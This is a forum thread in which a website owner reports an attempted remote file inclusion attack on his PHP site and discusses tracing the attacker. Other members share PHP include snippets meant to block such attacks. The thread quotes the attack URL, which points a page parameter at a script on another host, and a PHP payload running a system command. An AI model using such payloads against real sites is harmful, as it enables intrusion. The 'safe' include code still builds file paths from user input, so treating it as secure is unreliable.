Viewing Thread:
"Trying to do something to my site..."

Someone tried to do this:

http://phi11ip.com/?page=http://backup.wireplay.co.uk/.i/2

Luckily I wasn't stupid enough to leave the script open to attacks like that, it only accepts pages from my server.

It doesn't look like much, but I don't know what would happen if they had managed to run it:


$s = system("uname -a");
?>


What would that do?

Go phi11ip! Go phi11ip!

*makes stupid hand movements*

The person who I get the hosting with knows the owner of Wireplay.co.uk, they contacted them on MSN to find out what was happening...

The owner of Wireplay didn't have a clue about it but found out that whoever did it must have gotten onto their server and uploaded the script.

They've managed to find that the person is in Colchester and uses NTL, Wireplay have contacted NTL about it...

Detective Phi1 strikes again.

Oh, good.

Yup.

Would this sort of 'attack' only affect sites using PHP?

Looking through my log files, just found that it had been tried.

They're looking into it.

Thanks for that phi11ip.

How were you able to find out that someone had attempted this?

Of course it is.

Sorry, I was thinking about protection from inputed data into a form.

if (!$page) $page="mainpage"; //If $p is not defined by user, set it to 'main'

?>


if(file_exists("/phi11ip.com/var/www/html/$page.php"))
{
include("/phi11ip.com/var/www/html/$page.php");
}
else {
include("/phi11ip.com/var/www/html/404.php");
}

?>

cjh wrote:
> How have you done this??

$filetoinclude="filename.data";
if(file_exists($filetoinclude) == TRUE)
{ include("$filetoinclude"); }
else
{ include("whoops.data"); }
; ?>